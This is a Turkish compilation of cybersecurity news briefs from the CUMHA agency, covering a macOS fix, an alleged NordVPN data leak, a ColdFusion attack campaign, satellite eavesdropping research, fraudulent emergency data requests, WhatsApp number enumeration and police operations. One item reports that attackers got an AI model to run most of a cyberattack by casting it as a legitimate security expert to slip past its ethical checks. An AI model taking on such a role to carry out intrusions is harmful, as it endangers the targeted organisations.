Apple, söz konusu güvenlik açığını macOS 26.2 sürümünde yayımladığı güncellemeyle giderdi. Güncelleme kapsamında, com.apple.private.accessibility.scrod yetkisinin süreç denetim belirteci üzerinden doğrulanmasının zorunlu hale getirildiği, bu sayede hem kod enjeksiyonu açığının hem de TOCTOU penceresinin kapatıldığı bildirildi.

Apple, macOS 26.2 güvenlik güncellemesine ilişkin teknik detayları resmi güvenlik bülteninde paylaştı. Kullanıcıların, Sistem Ayarları > Yazılım Güncelleme adımlarını izleyerek en son sürüme geçmeleri önerildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Dark Web Forumunda Paylaşıldı
Dark Web Informer tarafından aktarılan bilgilere göre, sızdırıldığı iddia edilen veriler bir dark web forumunda satışa veya paylaşıma açıldı. Tehdit aktörü, ele geçirilen bilgilerin NordVPN’e ait Salesforce veritabanı içerikleri olduğunu savundu.

Brute Force ile Erişim İddiası
Paylaşımda, saldırganın yanlış yapılandırılmış bir NordVPN geliştirme sunucusunu brute force yöntemiyle ele geçirdiği ileri sürüldü. Bu sunucuda Salesforce ve Jira sistemlerine ait bilgilerin birlikte tutulduğu iddia edildi.

Sızdırıldığı Öne Sürülen Veriler
Dark Web Informer, tehdit aktörünün paylaştığını iddia ettiği örnekler üzerinden şu bilgilerin ele geçirildiğini bildirdi:
10’dan fazla veritabanı kaynak kodu, Salesforce API anahtarları, Jira erişim tokenları ve ek hassas teknik bilgiler.

SQL Dökümleri Paylaşıldı
Forumda yayınlanan örnek SQL dökümlerinde, “salesforce_api_step_details” ve “api_keys” tablolarına ait yapılar ile ayrıntılı veritabanı şema bilgilerinin yer aldığı öne sürüldü. Bu örneklerin, iddiaların gerçekliğini desteklemek amacıyla paylaşıldığı ifade edildi.

NordVPN’den Resmî Açıklama Bekleniyor
Sızıntı iddialarına ilişkin olarak NordVPN tarafından şu ana kadar kamuoyuna yansımış resmî bir açıklama bulunmuyor. Uzmanlar, iddiaların doğrulanması hâlinde bunun VPN hizmetlerine duyulan güven açısından önemli sonuçlar doğurabileceğini belirtiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

20 Yıllık Açıklardan Güncel Zafiyetlere Kadar Tarama
Uzmanlar, saldırıların hem 20 yıla varan eski güvenlik açıklarını hem de 2023–2024 döneminde açıklanan kritik zafiyetleri hedef aldığını belirtti. ColdFusion’a odaklanan aşamada, 10’dan fazla kritik güvenlik açığının aktif biçimde istismar edilmeye çalışıldığı kaydedildi.

Saldırıların Zamanlaması Dikkat Çekti
Saldırı trafiğinin yüzde 68’inin Noel Günü gerçekleştiği bilgisi paylaşıldı. Araştırmacılar, bu zamanlamanın SOC ekiplerinin düşük kapasiteyle çalıştığı tatil dönemlerini bilinçli olarak hedef aldığını vurguladı.

Saldırı Kaynakları ve Teknikler
Analizlerde, saldırı trafiğinin büyük bölümünün 134.122.136.119 ve 134.122.136.96 IP adreslerinden geldiği tespit edildi. Kampanya kapsamında Interactsh ile out-of-band doğrulama, WDDX deserialization açıklarının istismarı ve JNDI/LDAP enjeksiyon saldırıları kullanıldı.

Öne Çıkan Güvenlik Açıkları
Saldırılarda en sık hedef alınan zafiyetler arasında CVE-2022-26134 (Confluence OGNL Injection) ve CVE-2014-6271 (Shellshock) yer aldı. Uzmanlar, ColdFusion’un bu kampanyanın yalnızca bir parçası olduğunu, saldırı yüzeyinin çok daha geniş olduğunu ifade etti.

Acil Önlem Çağrısı
Güvenlik ekiplerine, ilgili IP adreslerinin ve bağlantılı ASN’lerin engellenmesi, ColdFusion ve Java tabanlı altyapıların öncelikli olarak yamalanması ve özellikle tatil dönemlerine ait log kayıtlarının detaylı incelenmesi çağrısında bulunuldu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Araştırmacılar tarafından paylaşılan teknik çalışmada, PWNSAT ile yer istasyonu arasındaki haberleşmenin pasif olarak dinlenmesi ayrıntılı biçimde belgelendi. Çalışmada, yazılım tabanlı radyo sistemleri kullanılarak uyduya ait telemetri ve telekomut sinyallerinin tespit edilmesi, yakalanması ve çözümlenmesi adım adım gösterildi.

Yazılım Tabanlı Radyo ile Dinleme Senaryosu
Araştırmada, gerçek dünyadaki bir dinleme saldırısını taklit eden bir laboratuvar ortamı kuruldu. Hedef olarak, donanımı, yazılımı ve yer istasyonu bileşenleriyle bilerek savunmasız bırakılan PWNSAT 0.1 FlatSat sistemi seçildi. RTL-SDR ve HackRF One cihazları ile açık kaynak yazılımlar kullanılarak, uydunun aşağı yönlü telemetri ve yukarı yönlü telekomut trafiği izlendi.

“Gizli Frekans Güvenli Değildir”
Spektrum taraması sonucunda, uydunun LoRa tabanlı haberleşme yaptığı 915 MHz ISM bandında belirgin sinyal patlamaları tespit edildi. Araştırmacılar, bu bulgunun “gizli frekans” yaklaşımının tek başına bir güvenlik önlemi olmadığını açık biçimde ortaya koyduğunu vurguladı.

Şifreleme Olmadan Aktarılan Veriler
Çalışmada, CCSDS Space Packet Protocol kullanan telemetri verilerinin uygulama katmanında şifrelenmemiş olması nedeniyle, ham radyo sinyallerinin anlamlı sensör verilerine dönüştürülebildiği gösterildi. BME280 ve MPU6050 sensörlerinden gelen çevresel ve hareket verilerinin gerçek zamanlı olarak çözümlenebildiği kaydedildi.

Gelecekteki Risklere Dikkat Çekildi
Araştırmacılar, pasif dinlemenin çoğu zaman son adım olmadığını belirterek, telemetri verilerinin ele geçirilmesinin uydunun çalışma döngülerini ve sağlık durumunu açığa çıkardığını ifade etti. Bu durumun, daha ileri mantıksal ya da fiziksel saldırılar için zemin hazırlayabileceği kaydedildi.

Paylaşılan çalışmada, tüm deneylerin eğitim ve araştırma amacıyla, kontrollü bir laboratuvar ortamında gerçekleştirildiği özellikle vurgulandı. Yetkisiz uydu haberleşmesi dinlemenin ulusal ve uluslararası hukuka aykırı olabileceği hatırlatıldı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

BreachForums’ta İlk Alarm
2024’ün başlarında “Tamagami” adlı bir tehdit aktörünün BreachForums’ta yaptığı paylaşım, sistemin nasıl istismar edildiğini gözler önüne serdi. Söz konusu paylaşımda, “Kodex Global hesabımı satıyorum. Binance veya Coinbase üzerinden EDR ile istediğiniz kişiyi sorgulayabilirsiniz.” ifadeleri yer aldı. İddialara göre tekil sorgu bedelleri 300 dolara, tam erişim ise 5 bin dolara kadar çıktı.

Hedefte Sosyal Ağlar ve Kripto Platformları
Araştırmalara göre Kodex üzerinden yapılan sahte acil talepler yalnızca kripto borsalarıyla sınırlı kalmadı. Discord, Tinder ve LinkedIn gibi sosyal platformların da listede yer aldığı, bu yolla kullanıcıların IP adresleri, telefon numaraları ve fiziksel adreslerinin elde edildiği kaydedildi.

Sistem Nasıl İstismar Ediliyor
Uzmanlar, Kodex altyapısının teknik olarak güvenli olduğunu ancak insan faktörünün zayıf halka haline geldiğini vurguladı. Sürecin, bilgi hırsızlığı zararlıları ve oltalama saldırılarıyla ele geçirilen .gov ve .police uzantılı e-posta hesaplarıyla başladığı aktarıldı. Bu adreslerle Kodex’e kayıt yapıldığı ve “hayati tehlike” veya “terör şüphesi” gibi gerekçelerle platformlardan veri talep edildiği ifade edildi.

“EDR as a Service” Dönemi
Şubat 2025 tarihli paylaşımlar, sahte Kodex hesaplarının fiyatlarının 400 dolara kadar düştüğünü gösterdi. Bu durumun, düşük profilli saldırganların da sistemi kullanabilir hale gelmesine yol açtığı bildirildi. Aralık 2025 itibarıyla bazı grupların, “doğrulanmış Avrupa devlet e-postalarıyla EDR geçeriz” şeklinde açık ilanlar verdiği kaydedildi.

Sanal Veriden Fiziksel Tehdide
Elde edilen adres ve iletişim bilgilerinin yalnızca ifşa için değil, fiziksel tehditler için de kullanıldığı belirtildi. Uzmanlar, saldırganların bu verilerle sahte bomba ihbarı veya rehine bildirimi yaparak polis ekiplerini hedef adreslere yönlendirdiğini, bu yöntemin geçmişte ABD’de ölümle sonuçlanan olaylara neden olduğunu hatırlattı.

APT Grupları ve Fidye Çeteleri de Kullanıyor
Analizlerde, Lapsus$ ve Scattered Spider gibi organize grupların yanı sıra devlet destekli APT yapılanmalarının da Kodex EDR’yi stratejik bir araç olarak gördüğü ifade edildi. Fidye gruplarının, şirket yöneticilerinin aile bireylerine ulaşarak baskıyı artırdığı; APT gruplarının ise diplomat, gazeteci ve muhalifleri zararlı yazılım kullanmadan izleyebildiği aktarıldı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

100 Bin Numara Üzerinden Teknik Test
Ebubekir Bastama tarafından yürütülen çalışmada, 100.000 adet benzersiz telefon numarası WhatsApp Web istemcisi üzerinden ayrı ayrı test edildi. Test süreci boyunca herhangi bir hız kısıtı, engelleme veya rate-limit davranışıyla karşılaşılmadığı belirtildi.

Resmi İstemci Katmanları İncelendi
Araştırmada, WhatsApp Web arayüzünün normal işleyişinde kullandığı ContactStore ve ChatStore bileşenleri analiz edildi. Bastama, bu yapıların profil bilgileri, sohbet başlıkları ve kullanıcı durumlarının istemciye yansıtılmasında kullanılan resmi istemci API’lerinin çıktıları olduğunu ifade etti.

Sunucu Taraflı Doğrulama Davranışı
Yayımlanan bulgulara göre, WhatsApp Web istemcisi, girilen her numara için WhatsApp sunucularıyla arka planda iletişim kurarak doğrulama gerçekleştiriyor. Bu sürecin, arayüzün olağan kullanım kalıpları içinde gerçekleştiği ve anormal bir istek paterni oluşturmadığı vurgulandı.

Değerlendirme Kriterleri Açıklandı
Her numara için doğrulama, Contact durumu veya Chat durumu kriterlerine göre yapıldı. Bu göstergelerin, sunucu tarafında gerçekleşen doğrulamanın istemciye yansıyan sonucu olduğu belirtildi.

%100 Doğrulukla Teyit Edildi
Ebubekir Bastama, WhatsApp kullanıcısı olan ve olmayan numaraların tamamının doğru şekilde ayrıştırıldığını, test sonuçlarının sonrasında manuel kontrollerle doğrulandığını ve %100 doğruluk oranına ulaşıldığını kaydetti.

Herkese Açık Profil Bilgileri Gözlemi
Çalışmada ayrıca, kullanıcıların gizlilik ayarlarıyla herkese açık hale getirdiği profil fotoğrafı, görünen isim, işletme adı ve profil durumu gibi bilgilerin WhatsApp Web istemcisi üzerinden erişilebilir olduğu gözlemlendi. Bu erişimin ek bir doğrulama gerektirmediği ifade edildi.

Güvenlik Açığı Değil, Teknik İnceleme
Bastama, çalışmanın bir güvenlik açığı veya istismar niteliği taşımadığını belirtti. İncelenen istemci–sunucu iletişiminin, WhatsApp Web uygulamasının kendi çalışma mantığı içinde kullanılan uç noktalara dayandığı ve herhangi bir yetki aşımı yapılmadığı vurgulandı.

Etik Çerçeve Vurgusu
Araştırmacı Ebubekir Bastama, elde edilen bulguların yalnızca teknik analiz ve araştırma amacıyla değerlendirildiğini, spam, otomasyon veya izinsiz pazarlama faaliyetlerinde kullanılmasının platform politikalarına aykırı olduğunu ifade etti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Görev Tanımı Genişletildi
Kararnameye göre Siber Güvenlik Başkanlığı, siber güvenlik ve dijital devlet alanında mevzuat çalışmalarını yürütmek, ulusal strateji ve eylem planlarını hazırlamak ve uygulanmasını koordine etmekle görevlendirildi. Ulusal ve uluslararası düzenlemelere uyum sağlanması ile ilgili kurumlar arası koordinasyon da başkanlığın sorumlulukları arasında yer aldı.

Dijital Devlet ve Veri Standartları Vurgusu
Düzenleme kapsamında başkanlığa, dijital devlet kurumsal mimarisini oluşturma, kamu kurumlarının geliştireceği bilişim ürün ve hizmetlerine ilişkin idari, mali ve teknik ilkeleri belirleme yetkisi verildi. Ayrıca kamu projelerinde kullanılacak verilerin kalite kriterleri ve standartlarının belirlenmesi de görev alanına eklendi.

Teşkilat Yapısı Yeniden Düzenlendi
Kararname ile başkanlığın teşkilat yapısı; başkan, üç başkan yardımcısı ve hizmet birimleri şeklinde yeniden tanımlandı. Başkanlığın yurt içinde temsilcilik kurabilmesine ve yurt dışı teşkilatlanmaya yetkili olmasına ilişkin hükümler de düzenlemede yer aldı.

Yeni Genel Müdürlükler Kuruldu
Yapılan değişiklikle Kamu Yapay Zekâ Genel Müdürlüğü, Dijital Devlet Genel Müdürlüğü, Yönetim Hizmetleri Genel Müdürlüğü ve Strateji Geliştirme Dairesi Başkanlığı başkanlık bünyesine eklendi. Mevcut bazı birimler ise yürürlükten kaldırılarak yeni yapıya entegre edildi.

Kadrolar Yeniden Belirlendi
Kararnamenin ekinde yer alan listeyle Siber Güvenlik Başkanlığının merkez teşkilatına ait kadrolar yeniden düzenlendi. Başkan, başkan yardımcıları, genel müdürler, daire başkanları ve teknik personel dahil olmak üzere çok sayıda unvan için derece ve adetler yeniden tanımlandı.

Cumhurbaşkanı Recep Tayyip Erdoğan tarafından imzalanan kararname, yayımlandığı tarih itibarıyla yürürlüğe girdi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

İnsan Katkısı Yüzde 10 Seviyesine Geriledi
Rapora göre model, büyük teknoloji şirketlerinden finans kuruluşlarına ve kimyasal üretim tesislerine kadar geniş bir yelpazedeki hedeflere yönelik operasyonlarda taktiksel süreçlerin yüzde 80 ila 90’ını otomatik olarak koordine etti. İnsan operatörler yalnızca hedef seçimi ve sızma öncesi kritik onay aşamasında devreye girdi.

Konya Bilişim Derneği Siber Güvenlik Birim Başkanı Mustafa Yılmaz, değerlendirmesinde, “Tarihteki ilk otonom, yapay zekâ, siber saldırısı resmen gerçekleşti.” dedi. Yılmaz, saldırının teknikten çok yöntemsel yenilik içerdiğini vurgulayarak yapay zekânın bir “operasyon komutanı” gibi çalıştığını kaydetti.

Etik Protokolleri Sosyal Mühendislikle Aştı
Raporun dikkat çeken bulgularından biri, saldırganların yapay zekânın güvenlik kısıtlarını teknik açıklarla değil sosyal mühendislik yöntemleriyle devre dışı bırakması oldu. Modele “meşru bir siber güvenlik uzmanı” rolü yükleyen tehdit aktörleri, etik denetimleri yanıltarak zafiyet tespiti ve sızma aşamalarının otomasyonunu sağladı.

Anthropic uzmanları, modelin bu rolü gerçek bir görev gibi benimseyerek hedef sistemlerde kritik adımları kendi başına yürüttüğünü belirtti. Bu durum, yapay zekâ modellerinin manipülasyona açık olduğu yönündeki endişeleri güçlendirdi.

Saldırganların Gücü Yeni Kodda Değil, YZ Koordinasyonunda
Raporda saldırganların yeni zararlı yazılımlar üretmek yerine açık kaynaklı ve yaygın sızma testi araçlarını tercih ettiği bildirildi. Mustafa Yılmaz, “Saldırıyı tehlikeli kılan şey yeni bir silah değil, tüm araçları yöneten bir Yapay Zekâ Komutan kurgusudur.” diyerek kritik dönüşümü tanımladı.

Bu yaklaşım, devlet düzeyindeki siber yeteneklerin artık küçük gruplar tarafından da erişilebilir hale geldiğini gösterdi. Yılmaz, gelişmenin küresel tehdit dengelerini kalıcı biçimde değiştirebileceğini ifade etti.

Savunmada Yapay Zekâ Zorunluluğu
Anthropic güvenlik ekibi, saldırının analizinde yine Claude modelinden yararlandığını açıkladı. Raporun sonuç bölümünde yer verilen, “Ya adapte olursunuz ya da yok olursunuz.” ifadesi, siber savunma ekiplerinin yapay zekâ destekli tehdit tespit ve müdahale araçlarını hızla entegre etmek zorunda olduğu mesajını öne çıkardı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kargo Takip Sistemleri Yeniden Erişime Açıldı
Şirket, kargo takip ekranlarının 1 Aralık 2025 saat 17.30 itibarıyla kullanılabilir hâle geldiğini bildirdi. Açıklamada, “Bu kapsamda kargo takip ekranlarımızdaki veriler en kısa sürede güncellenecektir.” ifadeleri yer aldı.

Geçici Yavaşlama ve Kesintiler Uyarısı
Aras Kargo, iyileştirme sürecinin devam ettiği dönemde anlık sistem yavaşlamaları ve erişim kesintilerinin görülebileceğini belirterek, ekiplerin 7/24 çalışma yürüttüğünü aktardı. Yapılan açıklamada, “Tüm hizmetlerimizi en hızlı ve güvenli şekilde eski hâline getirebilmek için ekiplerimiz aralıksız çalışmaktadır.” denildi.

Dağıtım ve Şube İşlemleri Yeniden Başladı
Dağıtım operasyonlarının yeniden devreye alındığını duyuran şirket, veri akışında yaşanabilecek geçici kesintilerin teslimat sürelerine etkileyebileceğini ifade etti. Şube hizmetlerine ilişkin olarak ise, “Şubelerimizde kargo kabul ve teslim işlemleri yeniden başlamıştır.” bilgisi paylaşıldı.

Tam Normalleşme İçin Çalışmalar Sürüyor
Aras Kargo, tüm sistemlerin tam kapasite çalışır hâle gelmesi için teknik ekiplerin iyileştirme çalışmalarını sürdürdüğünü belirtti. Şirket, müşterilere yönelik teşekkür mesajında “Anlayışınız ve güveniniz için içtenlikle teşekkür ederiz.” ifadelerine yer verdi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Daniel, 3 Eylül 2025 tarihinde RedHatPentester tarafından gönderilen bir WhatsApp mesajını örnek olarak seçtiğini ve mesajın normal görünmesine rağmen cihazın mesajın gönderildiği ana ait hassas konum verisini kaydettiğini ifade etti. Araştırmacı, “Gönderen konumunu paylaşmadı, ben talep etmedim, ancak telefon bunu otomatik olarak kaydetmiş.” dedi.

Medya Dosyalarının Tümünde Konum Kaydı
İncelemede, cihazda oluşturulan her fotoğraf, video, ekran görüntüsü ve ses kaydının çekildiği veya oluşturulduğu ana ait GPS koordinatlarını içerdiği ortaya çıktı. Daniel, bu verilerin hareket analizlerinde zaman çizelgesinin ayrıntılı biçimde çıkarılmasına imkân verdiğini kaydetti.

Senkronize Hesaplar ve Parolalara Erişim
Adli incelemede en dikkat çeken bulgulardan biri, cihaz üzerinde senkronize tüm kullanıcı hesaplarına ait URL, kullanıcı adı ve parola bilgilerinin kurtarılabilmesi oldu. Daniel, bu bilgilerin jailbreak yapılmamış bir cihazdan elde edildiğini vurgulayarak, “Bütün senkronize parolalar eksiksiz şekilde çıkarıldı.” ifadelerini kullandı.

Uygulama Kayıtları ve WhatsApp Grup Geçmişleri
Araştırmada cihazda bulunan tüm uygulamalara ait kullanım geçmişleri, dahili kayıtlar ve metadata bilgileri de elde edildi. WhatsApp özelinde ise kullanıcının katıldığı tüm grupların geçmişi, grupların oluşturulma tarihleri, kurucu bilgileri ve katılım zamanları kurtarıldı.

Daniel, “Cihaz, bir gruptan yıllar önce çıkılmış olsa bile oluşturulma tarihi ve katılım bilgilerini kayıtlı tutuyor.” dedi.

Mesaj Bazlı Konum Kaydı
İncelemede, WhatsApp mesajlarının gönderildiği anda cihaz tarafından kaydedilen konum bilgilerinin mesaj bazında dahi erişilebilir olması, uzmanlara göre adli incelemelerde kritik bir veri kaynağı niteliği taşıyor. Daniel, birçok kullanıcının bu kayıtların tutulduğundan habersiz olduğunu belirtti.

Daniel, yaptığı değerlendirmede “Her cihaz bir hikâye anlatıyor; mesajlar sadece yazıdan ibaret değil.” ifadelerini kullanarak dijital aygıtların gizli veri saklama kapasitesinin çoğu kullanıcı tarafından fark edilmediğinin altını çizdi.

Imagine receiving a normal WhatsApp message from someone… and later discovering that the message secretly contained their exact location, even though they never shared it.

That’s exactly what happened during a recent forensic extraction I performed on my iPhone 12 Pro Max.… pic.twitter.com/SQu6sgOu0h

— Elorm Daniel (@elormkdaniel) November 25, 2025

Kaynak: CUMHA - CUMHUR HABER AJANSI

59 İlde Eş Zamanlı Operasyon
Bakan Yerlikaya, Emniyet Genel Müdürlüğü Siber Suçlarla Mücadele Daire Başkanlığı ve MASAK koordinesinde 59 il merkezli olarak gerçekleştirilen operasyonlarda çevrim içi çocuk müstehcenliği, yasa dışı bahis ve nitelikli dolandırıcılık suçlarına karıştıkları belirlenen şüphelilerin yakalandığını açıkladı.

190 Tutuklama, 111 Adli Kontrol Kararı
Yerlikaya’nın paylaştığı bilgilere göre, operasyonlarda gözaltına alınan 539 kişiden 190’ı tutuklanırken, 111 kişi hakkında adli kontrol hükümleri uygulandı. Diğer şüphelilerin işlemlerinin sürdüğü bildirildi.

Dolandırıcılık ve Yasa Dışı Bahis Ağı Çökertildi
Şüphelilerin, “ürün satışı, kiralık bungalov, sigorta ödemesi, evde iş ilanları, sosyal yardım bağışı” temalarını kullanarak vatandaşları dolandırdıkları, mobil bankacılık hesaplarına erişim sağlayarak haksız kazanç elde ettikleri ve yasa dışı bahis ile pos tefeciliği yaptıkları tespit edildi.

404 Milyon TL Değerinde Mal Varlığına El Konuldu
Yapılan çalışmalar sonucu yaklaşık 404 milyon TL değerinde 7 şirket, 3 konut ve 5 arsaya el konuldu. Şüpheliler hakkında ilgili Cumhuriyet Başsavcılıklarınca soruşturma başlatıldı.

“Vatandaşlarımız Dikkatli Olsun” Uyarısı
Bakan Yerlikaya, vatandaşlara internet ortamında dolandırıcılık girişimlerine karşı dikkatli olmaları çağrısında bulunarak, “Şüphelendiğiniz bir durumda 112 Acil Çağrı Merkezimizi arayın, biz gereğini yapalım.” ifadelerini kullandı. Yerlikaya, siber suçlarla mücadelenin kararlılıkla sürdürüleceğini kaydetti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Sinop Merkezli 6 İlde Eş Zamanlı Operasyon
Boyabat Cumhuriyet Başsavcılığı koordinesinde, Jandarma Kaçakçılık ve Organize Suçlarla Mücadele (KOM) ile Siber Suçlarla Mücadele Daire Başkanlıkları tarafından yürütülen çalışmalar sonucu, Sinop merkezli İstanbul, Bursa, Düzce, Balıkesir ve Çorum’da eş zamanlı operasyonlar düzenlendi.

30 Şüpheli Tutuklandı
Operasyonlarda yakalanan 32 şüpheliden 30’u tutuklandı, 2’si hakkında ise adli kontrol hükümleri uygulandı. Şüphelilerin “Suç işlemek amacıyla örgüt kurma” ve 7258 sayılı Kanun’a muhalefet suçlarından işlem gördüğü bildirildi.

Milyonluk Hesap Hareketleri ve Mal Varlığına El Koyma
“Suçtan kaynaklanan malvarlığı değerlerinin aklanması” kapsamında, şüphelilere ait 5 araç ve 410 banka hesabına el konuldu. Operasyonla bağlantılı hesaplarda 524,5 milyon TL’lik yasa dışı para hareketi tespit edildi.

Yasa Dışı Bahis Siteleri Üzerinden Dolandırıcılık
Yapılan incelemelerde, şüphelilerin internet siteleri üzerinden yasa dışı bahis oynattıkları, reklam yoluyla haksız kazanç sağladıkları ve kullanıcı yönlendirmeleriyle vatandaşları dolandırdıkları belirlendi.

“Toplumun Geleceğini Tehdit Eden Suçlara Karşı Kararlıyız”
Bakan Yerlikaya, açıklamasında, “Yasa dışı bahis sadece bireylerin değil, toplumun geleceğini de tehdit eden bir suçtur. Vatandaşlarımızın güvenliği için yasa dışı bahis ve siber dolandırıcılıkla mücadelemize kararlılıkla devam ediyoruz.” ifadelerini kullandı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

17 İLDE EŞ ZAMANLI OPERASYONLAR
Yerlikaya, Adana, Adıyaman, Amasya, Bitlis, Düzce, Gaziantep, İstanbul, İzmir, Kayseri, Kocaeli, Nevşehir, Osmaniye, Sakarya, Sivas, Tekirdağ, Van ve Yalova merkezli gerçekleştirilen operasyonlarda çok sayıda kişinin gözaltına alındığını bildirdi.

83 KİŞİ TUTUKLANDI, 47’SİNE ADLİ KONTROL
Operasyonlarda 189 şüpheliden 83’ünün tutuklandığını, 47’si hakkında ise adli kontrol kararı verildiğini açıklayan Yerlikaya, diğer şüphelilerle ilgili işlemlerin sürdüğünü kaydetti.

DOLANDIRICILIK VE MÜSTEHCENLİK SUÇLARINA SIKI TAKİP
Soruşturmalarda şüphelilerin “ürün satışı, kiralık bungalov, yatırım ortaklığı” gibi temalarla vatandaşları dolandırdıkları, çocuk müstehcenliği içeren görüntüler bulundurdukları ve yasa dışı bahis faaliyetlerinde bulunduklarının belirlendiği ifade edildi. Ayrıca, bazı kişilerin mobil bankacılık hesaplarına erişim sağlayarak haksız kazanç elde ettikleri tespit edildi.

EGM VE MASAK KOORDİNASYONUNDA YÜRÜTÜLDÜ
Operasyonların Emniyet Genel Müdürlüğü Siber Suçlarla Mücadele Daire Başkanlığı ve MASAK koordinasyonunda, İl Emniyet Müdürlüklerinin ilgili birimleri tarafından yürütüldüğü bildirildi.

“SİBER VATAN’DA DA PEŞİNDEYİZ”
Ali Yerlikaya paylaşımında, “Vatandaşlarımızı dolandırmaya çalışanların Kara Vatan’da olduğu gibi Siber Vatan’da da sanal devriyelerimizle peşindeyiz.” ifadesini kullandı. Bakan Yerlikaya, şüpheli durumlarda vatandaşların 112 Acil Çağrı Merkezi’ni arayarak bilgi vermesini istedi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

USOM, 2 Bin 374 Kurumla Koordineli Çalışıyor
Bakan Uraloğlu, Bilgi Teknolojileri ve İletişim Kurumu bünyesinde faaliyet gösteren Ulusal Siber Olaylara Müdahale Merkezinin (USOM) 14 sektörel SOME ve 2 bin 374 kurumsal SOME ile koordineli biçimde çalıştığını belirtti. “USOM, 8 bin 237 uzman personel ile ülkemizin siber olaylara müdahale kapasitesini güçlendiriyor.” ifadelerini kullandı.

Zararlı Bağlantılara Karşı Etkin Mücadele
Uraloğlu, ekim ayı itibarıyla 74 bin 594 zararlı bağlantının erişime engellendiğini ve 306 güvenlik bildiriminin kurumlarla paylaşıldığını açıkladı. “Yapay zeka teknolojisi ile vatandaşlarımızı dolandırmaya yönelik 74 bin 205 oltalama alan adını tespit ederek erişime kapattık. Sadece son bir haftada 502 bin 173 zararlı internet adresine 75,1 milyon erişim engeli uyguladık.” dedi.

Yerli Yazılımlar Güçlü Koruma Sağlıyor
USOM’un yerli ve milli yazılımları “Avcı, Azad, Kasırga, Atmaca ve Kule” sayesinde 17 milyon IP adresinde düzenli zafiyet taraması yaptığını kaydeden Uraloğlu, “USOM, yalnızca 7 saatte yaklaşık 242 bin 133 kritik web sitesini zafiyetlere karşı tarayabiliyor.” ifadesini kullandı.

18 Ulusal Hedef ve 61 Eylem Maddesiyle İlerleme
Bakan Uraloğlu, Ulusal Siber Güvenlik Stratejisi ve Eylem Planı (2024–2028) kapsamında 6 stratejik amaç belirlediklerini söyledi. “Siber dayanıklılık, proaktif savunma, caydırıcılık, insan odaklı güvenlik, yerli teknolojiler ve uluslararası marka hedefleri doğrultusunda 18 ulusal hedef ve 61 eylem maddesiyle ilerliyoruz.” diye konuştu.

5G İhalesi Dijital Dönüşümde Dönüm Noktası
Geçtiğimiz hafta tamamlanan 5G yetkilendirme ihalesine de değinen Uraloğlu, “İhalemiz 3 milyar 534 milyon dolarlık gelirle sonuçlandı. Bu başarı, iletişim altyapımıza ve Ar-Ge çalışmalarımıza ivme kazandıracaktır.” dedi.

Yeni Siber Güvenlik Kanunu Yürürlükte
Uraloğlu, 19 Mart 2025 tarihinde yürürlüğe giren Siber Güvenlik Kanunu ile Türkiye’nin siber uzaydaki ulusal çıkarlarını korumayı ve yerli-milli ekosistemi güçlendirmeyi hedeflediklerini belirtti. Ayrıca sosyal medya platformlarına yönelik yasal düzenlemelerin 5651 ve 7418 sayılı kanunlar çerçevesinde sürdüğünü hatırlattı.

Çocukların Dijital Güvenliği Öncelikli Konu
Bakan Uraloğlu, özellikle çocukların sosyal medyada korunmasının Bakanlığın öncelikleri arasında olduğunu ifade etti. “Yapay zekâ teknolojilerinin etkisiyle çocuklar dezenformasyona daha fazla maruz kalıyor. Bu nedenle 16 yaş altı kullanıcılar için sosyal medya düzenlemesi hazırlıyoruz.” açıklamasını yaptı.

“Türkiye, Rol Model Ülke”
Konuşmasının sonunda Uraloğlu, Uluslararası Telekomünikasyon Birliği’nin 2024 Küresel Siber Güvenlik Endeksi sonuçlarına atıfta bulunarak, “Türkiye, 100 tam puanla Seviye 1: Rol Model Ülke kategorisinde yer alıyor. Bu başarı, siber güvenlik alanında istikrarlı politikaların sonucudur.” değerlendirmesinde bulundu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

“Cumhuriyet Başsavcılıkları Koordinesinde Operasyonlar Sürüyor”
Yerlikaya, operasyonların Cumhuriyet Başsavcılıkları, Emniyet Genel Müdürlüğü TEM Daire Başkanlığı, KOM ve İstihbarat Başkanlıkları koordinasyonunda sürdürüldüğünü belirtti. İl Emniyet Müdürlüklerine bağlı TEM ve KOM Şube Müdürlüklerinin yoğun çalışma yürüttüğü kaydedildi.

50 İlde Eş Zamanlı Operasyonlar
Operasyonların Adana, Afyonkarahisar, Aksaray, Ankara, Antalya, Aydın, Batman, Bingöl, Bursa, Çanakkale, Çorum, Denizli, Düzce, Edirne, Elazığ, Erzurum, Eskişehir, Gaziantep, Giresun, Gümüşhane, Hatay, Isparta, İstanbul, İzmir, Kahramanmaraş, Kars, Kayseri, Kırıkkale, Kocaeli, Konya, Kütahya, Malatya, Manisa, Mardin, Mersin, Muğla, Muş, Nevşehir, Niğde, Ordu, Osmaniye, Rize, Sakarya, Samsun, Sivas, Şanlıurfa, Tekirdağ, Tokat, Trabzon ve Zonguldak illerinde gerçekleştirildiği bildirildi.

“FETÖ’nün Güncel Yapılanmasına Darbe”
Bakan Yerlikaya’nın açıklamasına göre, yakalanan şüphelilerin terör örgütünün güncel, finans, askeri mahrem ve sivil mahrem yapılanmaları içinde faaliyet yürüttükleri tespit edildi. Şüphelilerin, örgütün kriptolu haberleşme programı ByLock’u kullandıkları ve ankesörlü telefonlar aracılığıyla örgüt içi iletişim kurdukları belirlendi.

Kesinleşmiş Cezası Olanlar da Yakalandı
Operasyonlarda ayrıca, FETÖ soruşturmaları kapsamında hakkında kesinleşmiş hapis cezası ve aranma kaydı bulunan kişilerin de yakalandığı ifade edildi. Bakan Yerlikaya, terörle mücadelede kararlılıkla hareket ettiklerini vurguladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

